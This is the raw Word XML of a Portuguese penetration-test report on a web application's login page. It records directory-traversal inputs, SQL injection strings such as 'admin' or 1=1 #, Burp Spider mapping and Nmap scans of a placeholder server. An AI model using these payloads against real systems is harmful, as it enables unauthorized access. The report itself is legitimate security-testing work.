    <w:p w:rsidR="00817857" w:rsidRPr="00D56FE7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17857" w:rsidRPr="00D56FE7" w:rsidRDefault="00817857" w:rsidP="0085362D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64B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44368" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Não foi possível obter o acesso a qualquer outra parte do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085362D" w:rsidRDefault="0085362D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%2e%2e%2f%2e%2e%2f (código equivalente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 xml:space="preserve">a ../../)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8C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00830E80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../../” serv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tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor que hospeda o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D56FE7" w:rsidRDefault="0081785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C6DC7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536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ado=../data.j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para acessar o arquivo “data.js”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6C31FD" w:rsidRPr="00D56FE7" w:rsidRDefault="006C31FD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C6DC7" w:rsidRPr="0085362D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O</w:t>
      </w:r>
      <w:r w:rsidR="00284BB3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="006C31FD" w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comando “../” serve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 para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0085362D" w:rsidRDefault="008C6DC7" w:rsidP="0085362D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362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="006C31FD" w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ata.js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” é </w:t>
      </w:r>
      <w:r w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>um arquivo descoberto através do es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caneamento realizado pela funcionalidade </w:t>
      </w:r>
      <w:r w:rsidR="00E158B8" w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Spider</w:t>
      </w:r>
      <w:r w:rsidR="00C8356E" w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r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="00284BB3" w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>da ferramenta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Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="00C8356E" w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="008536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362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para mapear a estrutura de pastas da aplicação.</w:t>
      </w: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284BB3" w:rsidRPr="00D56FE7" w:rsidRDefault="00284BB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352313" w:rsidRPr="00D56FE7" w:rsidRDefault="00352313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4BB3" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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8536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login.php?logado=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./ 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D56FE7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  “../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w: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C0836" w:rsidRPr="00D56FE7" w:rsidRDefault="002C0836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/login.php?login=teste&amp;senha=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./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C0836" w:rsidRPr="00D56FE7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  “../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w: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que o sistema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impeça o acesso</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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  <w:r w:rsidR="00D76012"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6AE5" w:rsidRDefault="00136AE5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url </w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00D56FE7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login.php?login=teste&amp;senha=.. ,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D56FE7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D56FE7" w:rsidRDefault="006D580D" w:rsidP="002C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omando</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “..”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C31FD" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="006C31FD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3164B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que o sistema bloqueie o acesso. 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D56FE7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9D0F86" w:rsidRPr="00D56FE7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35C4" w:rsidRPr="00D56FE7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4.3.1.3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Login - Mapeamento da hierarquia de pastas do sistema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30/03/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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tilizar de forma automatizada o módulo Burp Spider da ferramen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ta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Burp Suite e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 xml:space="preserve">a partir da URL da tela de Login: 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I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P_do_servidor/nomeSistema/login.php</w:t>
      </w:r>
      <w:r w:rsidR="00136AE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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realizar um reconhecimento d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hierarquia de diretórios do sistema armazenados dentro do servidor. </w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os resultados, verificar se foi possível ter acesso à hierarquia de pastas do sistema mesmo sem efetuar a requisição do login. Além disso, verificar se é possível ter acesso aos códigos da aplicação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136A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cessar a página do Login utilizando a url http:// IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistem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/login.php. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36925" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="00384949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C3692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não permit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a visualização da hierarquia de pastas do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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4949" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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Conforme mostra figura 3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de Login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00654DEF" w:rsidRPr="00D56FE7" w:rsidRDefault="00654DEF" w:rsidP="00136A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64B7" w:rsidRPr="00D56FE7" w:rsidRDefault="008A7473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8207873" wp14:editId="40B9CB10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Figura 3 - Resultado mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="00136AE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a partir da tela de Login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384949" w:rsidP="003139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1.4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Login - Exploração via SQL Injection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07/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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40 minutos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ubmeter entradas maliciosas no sistema através de injeção de</w:t>
      </w:r>
      <w:r w:rsidR="00384949" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> códigos SQL na página de Login. Então, atra</w:t>
      </w:r>
      <w:r w:rsidR="00313924">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">vés de 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>s</w:t>
      </w:r>
      <w:r w:rsidR="00313924">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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>s</w:t>
      </w:r>
      <w:r w:rsidR="00384949" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00930BEA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forçar ações não autorizadas no sistema.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Verificar se o campo Login é vulnerável a injeção de código SQ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>a técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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admin’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F40A0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Pr="00D56FE7" w:rsidRDefault="001A1CBE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D56FE7" w:rsidRDefault="003F40A0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sultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00C36925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D56FE7" w:rsidRDefault="005967D5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CC5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Login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC524A" w:rsidRDefault="00CC524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CC52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D56FE7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inline [8,9 e 10] como entrada no campo Login, a fim de modificar a instrução SQL utilizada pelo sistema na </w:t>
      </w:r>
      <w:r w:rsidR="00765ACB" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>consulta de dados referentes aos usuári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cadastrados. Comentários inline </w:t>
      </w:r>
      <w:r w:rsidR="00765ACB" w:rsidRPr="00D56FE7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s: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admin’ or 1=1 #  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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1  -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB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67BC" w:rsidRPr="00D56FE7" w:rsidRDefault="00765ACB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7067BC" w:rsidRPr="00D56FE7" w:rsidRDefault="007067BC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realize o devido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tratamento para impedir que as instruções de </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comentários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não sejam interpretada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9F24CC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> como comentários inline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5ACB" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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45B49" w:rsidRDefault="00745B49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745B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:rsidR="00594AD8" w:rsidRPr="00D56FE7" w:rsidRDefault="00594AD8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Inserir um texto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uma única aspa simples para completar a entrada de uma possível instrução SQL executada no momento do login no sistema. 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ntradas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC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dmin’ or ‘a’=’a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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4E230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765ACB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D56FE7" w:rsidRDefault="004E2307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e todos os caracteres informados como parâmetros regulares da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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745B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F31428" w:rsidRPr="00D56FE7" w:rsidRDefault="00F31428" w:rsidP="00745B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Pr="001A1CBE" w:rsidRDefault="008C6DC7" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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A1CBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00F31428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2.1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966EC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade: a</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nálise do s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ervidor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via Nmap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no dia 09/04/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="005A089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7D094F" w:rsidRDefault="007D094F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tilizar a ferramenta Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00F31428" w:rsidRPr="00D56FE7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descobrir portas abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atividade</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> maliciosa</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pode</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser desenvolvida</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a partir disso.</w:t>
      </w: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 nmap -Ss -O IP_do_servidor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nmap” executa a ferramenta Nmap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Ss” permite que a ferramenta tente fazer o scan SYN do TCP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7D09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IP_do_servidor informa o IP onde está hospedada a aplicação em teste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2307" w:rsidRPr="00D56FE7" w:rsidRDefault="004E230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4777A" w:rsidRPr="00D56FE7" w:rsidRDefault="0084777A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descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e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os serviç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que estão rodand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1428" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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rro na ferramenta.</w:t>
      </w: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094F" w:rsidRDefault="007D094F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A83EB9" w:rsidP="007D09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8C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="007D094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 nmap -sS -O IP_do_servidor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nmap” executa a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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sS” permite que a ferramenta tente fazer o scan SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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197C78" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="007D094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197C78" w:rsidRPr="00D56FE7" w:rsidRDefault="00197C7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7C78" w:rsidRPr="00D56FE7" w:rsidRDefault="00197C7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7C78" w:rsidRPr="00D56FE7" w:rsidRDefault="00197C78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e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="007D09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3D74" w:rsidRPr="00D56FE7" w:rsidRDefault="00F31428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2F72" w:rsidRPr="00D56FE7" w:rsidRDefault="008C2F72" w:rsidP="007D094F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4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, e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serviço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que estavam rodand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4DEF" w:rsidRPr="00D56FE7" w:rsidRDefault="00654DEF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32B0053F" wp14:editId="25C612F6">
            <wp:extent cx="4957296" cy="350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13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4 </w:t>
      </w:r>
      <w:r w:rsidR="000F4CD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–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ortas encontradas e os serviços que estavam rodando n</w:t>
      </w:r>
      <w:r w:rsidR="000F4CD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>elas no momento do escaneamento via Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00D56FE7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23D7" w:rsidRPr="00D56FE7" w:rsidRDefault="001923D7" w:rsidP="000F4C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e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ncontrados na figura 4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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao TeamViewer que conecta </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00D56FE7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Servidor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 xml:space="preserve"> Web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r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8C2F72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D56FE7" w:rsidRDefault="00E513AC" w:rsidP="000F4CD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751591" w:rsidRPr="00D56FE7" w:rsidRDefault="001923D7" w:rsidP="000F4C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513AC" w:rsidRPr="00D56FE7" w:rsidRDefault="00E513A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Default="00A83EB9" w:rsidP="000F4C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1A1CBE" w:rsidRPr="00D56FE7" w:rsidRDefault="001A1CBE" w:rsidP="000F4CD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0F4C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:  nmap -sV  -O IP_do_servidor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D56FE7" w:rsidRDefault="00CE03DD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nmap” executa a ferramenta Nmap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“-sV” permite que a ferramenta realize o SYN e busque a versão do </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>software rod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o momento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0F4CD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D56FE7" w:rsidRDefault="008C6DC7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97C78" w:rsidRPr="00D56FE7" w:rsidRDefault="00197C78" w:rsidP="000F4CD1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7C78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, os serviços e as versões dos softwares que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78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559" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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197C78" w:rsidP="000F4C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5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, os serviços e a versão dos softwares que estavam rodando nessas portas no momento do escaneamento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624EB" w:rsidRPr="00D56FE7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AD22F60" wp14:editId="2C703EB5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Figura 5 - Portas </w:t>
      </w:r>
      <w:r w:rsidR="0096190A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>encontrad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 versões dos si</w:t>
      </w:r>
      <w:r w:rsidR="0096190A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stemas que elas estavam rodando, no momento do escaneamento via Nmap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751591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Serviços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2A5CE5" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e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5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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao TeamViewer que conecta </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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8C6DC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6853AA" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r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197C78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D56FE7" w:rsidRDefault="00E92559" w:rsidP="00BC404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D56FE7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="001923D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8A79EE" w:rsidRPr="00D56FE7" w:rsidRDefault="008A79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BC4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  nmap -sU -O IP_do_servidor.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D56FE7" w:rsidRDefault="001A5DFB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nmap” executa a ferramenta Nmap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sU” permite que a ferramenta utilize o detector de portas UDP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C0198A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C404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D56FE7" w:rsidRDefault="008C6DC7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E95ED3" w:rsidRPr="00D56FE7" w:rsidRDefault="00E95ED3" w:rsidP="00BC404F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95ED3" w:rsidRPr="00D56FE7" w:rsidRDefault="00E95ED3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os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95ED3" w:rsidRPr="00D56FE7" w:rsidRDefault="00E95ED3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2559" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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E95ED3" w:rsidRPr="00D56FE7" w:rsidRDefault="00640C50" w:rsidP="00BC40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De acordo com a figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3"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="00E95ED3"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95ED3"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as portas </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UDP abertas e</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5DFB" w:rsidRPr="00D56FE7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C624EB" w:rsidP="00BC40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 wp14:anchorId="3FEFC17C" wp14:editId="6BDE8DD5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-137160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5667375" cy="3793490"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21477"/>
                <wp:lineTo x="21564" y="21477"/>
                <wp:lineTo x="21564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DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 6 - Portas UDP escaneadas e serviços que estavam rodando n</w:t>
      </w:r>
      <w:r w:rsidR="00BC404F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>elas no momento do escaneamento via Nmap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807" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00335763">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707" w:hanging="14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</w:t>
      </w:r>
      <w:r w:rsidR="00B25D43" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidR="003F4807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B25D43" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
